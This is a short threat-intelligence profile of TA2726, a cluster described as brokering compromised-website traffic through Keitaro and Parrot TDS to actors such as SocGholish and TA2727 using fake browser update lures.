TA2726

TA2726 is a financially motivated threat actor cluster assessed to function primarily as a traffic provider or traffic distribution service for other threat actors. Reporting links TA2726 to operation of Parrot TDS and abuse of Keitaro TDS/Keitaro Tracker, including use of stolen or cracked Keitaro licenses. TA2726 has been described as compromising websites and injecting Keitaro TDS links, then selling or brokering that traffic to customers including other malware actors. The cluster is specifically linked to supporting SocGholish/FakeUpdates and TA2727. Multiple reports state that TA2726 functioned as a traffic provider for SocGholish and TA2727 by compromising websites and injecting Keitaro TDS links for resale. Proofpoint assessed that TA2726 may act as a traffic distribution service for other threat actors, and that TA2726 and TA2727 were both involved in web-inject campaigns using fake browser update lures. TA2726 and TA2727 have both been linked to fake browser updates as an attack vector, and FrigidStealer activity has been linked to both clusters. Observed tactics and tradecraft directly mentioned in the reporting include use of traffic distribution systems, website compromise, malicious web injects, fake browser update lures, and traffic brokering/resale. TA2726 is also described as operating infrastructure used to route victims to downstream malicious activity. Content does not directly attribute malware development to TA2726; rather, the high-confidence characterization is that it provides and monetizes traffic and redirection infrastructure used by other actors. Known alias in the provided content: TA2726.